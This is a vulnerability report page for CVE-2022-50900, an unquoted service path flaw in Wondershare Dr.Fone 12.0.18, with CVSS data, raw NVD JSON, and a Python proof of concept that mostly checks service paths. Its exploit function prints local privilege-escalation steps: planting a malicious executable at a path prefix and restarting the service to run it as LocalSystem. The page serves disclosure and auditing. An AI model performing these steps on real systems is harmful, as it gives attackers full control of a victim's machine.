Security Vulnerability Report
CVE-2022-50900 CVSS 8.4 HIGH

CVE-2022-50900

Published: 2026-01-13 23:15:52
Last Modified: 2026-01-28 19:59:19

Description

Wondershare Dr.Fone 12.0.18 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path to insert malicious code that will be executed with LocalSystem permissions during service startup.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
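CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (this is the Secondary-source vector; the Primary CVSS 3.1 entry in the raw JSON below is 7.8 HIGH, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, i.e. it assumes a low-privileged local account)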

Configurations (Affected Products)

cpe:2.3:a:wondershare:dr.fone:12.0.18:*:*:*:*:*:*:* - VULNERABLE
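Wondershare Dr.Fone < 12.0.18 (note: this range excludes 12.0.18 itself, which the description and the CPE entry above identify as the vulnerable version)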
Wondershare InstallAssist (related service component)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
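#!/usr/bin/env python3
"""
CVE-2022-50900 PoC - Wondershare Dr.Fone Unquoted Service Path

This PoC demonstrates the unquoted service path vulnerability (CWE-428)
in Wondershare Dr.Fone 12.0.18.
Note: For educational and authorized testing purposes only

Background: when a service's binary path contains spaces and is not wrapped
in double quotes, Windows resolves the executable by trying each
space-delimited prefix of the path in turn. A binary present at one of the
earlier prefixes is started under the service account (LocalSystem here)
instead of the intended one.

Remediation: wrap the executable path in double quotes in the service
configuration (the service's ImagePath value) and make sure unprivileged
users cannot write to any directory along that path.
"""
import os
import sys
import ctypes
import subprocess


def extract_binary_paths(sc_output):
    """Return every BINARY_PATH_NAME value found in ``sc qc`` output.

    Args:
        sc_output: Text printed by ``sc qc <service>``.

    Returns:
        A list of stripped path strings, empty when the field is absent.
    """
    paths = []
    for line in sc_output.splitlines():
        # Split on the first colon only: the value itself contains "C:".
        label, sep, value = line.partition(':')
        if sep and 'BINARY_PATH_NAME' in label:
            paths.append(value.strip())
    return paths


def is_unquoted_path_with_spaces(binary_path):
    """Tell whether the executable part of a service command line is at risk.

    Only the executable portion matters: a space that appears solely in the
    arguments (for example ``svchost.exe -k netsvcs``) does not create the
    path ambiguity, so it is not reported.

    Args:
        binary_path: The BINARY_PATH_NAME value of a service.

    Returns:
        True when the executable path is unquoted and contains a space.
    """
    command = binary_path.strip()
    if not command or command.startswith('"'):
        return False

    # Cut the command line at the first ".exe" to separate the executable
    # from its arguments. Without that marker the split point is unknown, so
    # the whole string is inspected (conservative: may over-report).
    exe_end = command.lower().find('.exe')
    executable = command[:exe_end + len('.exe')] if exe_end != -1 else command
    return ' ' in executable


def check_service_path(service_name):
    """Check if the service has an unquoted executable path with spaces.

    Runs ``sc qc <service_name>`` and inspects its BINARY_PATH_NAME field.

    Args:
        service_name: Name of the Windows service to query.

    Returns:
        True when an unquoted executable path containing spaces is found;
        False otherwise, including when the query itself fails.
    """
    try:
        # Argument list, no shell: service_name is never shell-interpreted.
        result = subprocess.run(
            ['sc', 'qc', service_name],
            capture_output=True,
            text=True,
        )
    except (OSError, subprocess.SubprocessError, UnicodeError) as e:
        # OSError covers a missing ``sc`` binary (non-Windows hosts).
        print(f"[-] Error checking service: {e}")
        return False

    paths = extract_binary_paths(result.stdout)
    if not paths:
        return False

    print(f"[*] Checking service: {service_name}")
    for path in paths:
        print(f"[+] Service path: {path}")
        if is_unquoted_path_with_spaces(path):
            print("[!] VULNERABLE: Unquoted path with spaces detected!")
            return True
    return False


def exploit_unquoted_path(malicious_exe_path, target_service):
    """Print how the unquoted path of ``target_service`` can be abused.

    This function only prints text. It creates no file and does not stop,
    start or modify the service.

    Args:
        malicious_exe_path: Unused; kept so existing callers keep working.
        target_service: Service name interpolated into the printed text.
    """
    # Why the finding matters, using the page's example path
    #   C:\Program Files\Wondershare\Dr.Fone\bin\Service.exe
    # Unquoted, Windows tries C:\Program.exe before the real binary.
    # Quoting the path and restricting write access to the parent
    # directories closes that window.
    print("[*] To exploit this vulnerability:")
    print("[1] Create a malicious executable at a path that matches the first segment")
    print(f"[2] Wait for the service to restart or force restart: sc stop {target_service} && sc start {target_service}")
    print("[3] The malicious code will execute with LocalSystem privileges")
    print("\n[!] This is for authorized security testing only!")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2022-50900 - Wondershare Dr.Fone Unquoted Service Path")
    print("=" * 60)

    # ctypes.windll exists only on Windows; stop with a clear message
    # instead of an AttributeError elsewhere.
    if sys.platform != "win32":
        print("[-] This check must be run on Windows")
        sys.exit(1)

    # Check if running with admin privileges
    if ctypes.windll.shell32.IsUserAnAdmin():
        print("[+] Running with administrator privileges")
    else:
        print("[!] Warning: Not running as administrator")

    # Candidate service names to audit.
    # NOTE(review): confirm these against the services actually installed.
    vulnerable_services = ['InstallAssist', 'DrFoneService', 'Wondershare Service']
    for svc in vulnerable_services:
        if check_service_path(svc):
            exploit_unquoted_path(None, svc)
            break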

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50900", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:52.183", "lastModified": "2026-01-28T19:59:18.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wondershare Dr.Fone 12.0.18 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path to insert malicious code that will be executed with LocalSystem permissions during service startup."}, {"lang": "es", "value": "Wondershare Dr.Fone 12.0.18 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a los usuarios locales ejecutar código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta de servicio mal configurada para insertar código malicioso que se ejecutará con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wondershare:dr.fone:12.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "F13A095F-E629-45EE-BEC3-3C9CEED231AB"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50813", "source": "[email protected]", "tags": ["Exploit"]}, {"url": 
"https://www.vulncheck.com/advisories/wondershare-drfone-wondershare-installassist-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.wondershare.com/", "source": "[email protected]", "tags": ["Product"]}]}}